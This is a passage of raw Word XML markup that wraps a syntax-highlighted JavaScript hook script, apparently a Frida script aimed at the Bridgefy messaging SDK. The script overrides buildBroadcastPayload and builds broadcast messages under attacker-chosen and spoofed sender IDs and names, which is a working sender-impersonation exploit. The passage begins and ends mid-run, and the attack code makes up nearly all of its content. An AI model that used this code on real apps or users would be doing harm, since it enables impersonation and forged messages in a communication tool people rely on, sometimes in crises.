      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1440" w:right="2862" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ATTACKER_ID=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"58ac0b67-bb4f-459e-9b82-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4b67c81abf3c" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SPOOFED_ID=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"c25e5be3-98c6-4bd5-b339-2487b26618a4" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>NEW_ID=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"884d7d30-9b24-11ed-a8fc-0242ac120002"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="32"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="1666" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bridgefyService.buildBroadcastPayload.overload(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'java.lang.String'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'kotlin.coroutines.Continuation'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>).implementation = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(arg0, arg1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="1440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.buildBroadcastPayload.overload(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'java.lang.String'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'kotlin.coroutines.Continuation'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>).apply(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, arguments);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>responsestr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>JSON.stringify(response);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="1440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//&lt;instance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>java.lang.Object,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$className: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>me.bridgefy.messagekit.model.BroadcastPayload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>console.log(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"[+] responsestr = " </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>responsestr);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="164"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="369" w:firstLine="1440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payload.$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(ATTACKER_ID,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"userand"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"userandnock"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"from userand"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, timestamp);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="1440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//'java.lang.String',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'java.lang.String',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'java.lang.String',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'int', 'java.lang.String', 'long'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="1440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//senderId=58ac0b67-bb4f-459e-9b82-4b67c81abf3c,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>senderName=userand, senderNickname=userandnock, senderAvatar=1, message=gjgif, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>createdOn=1674396168973</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="369" w:firstLine="1440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payload.$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(SPOOFED_ID,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"nebula"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"nebii"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>spooded nebula"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, timestamp);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="1440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payload.$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(NEW_ID,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"ghost2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
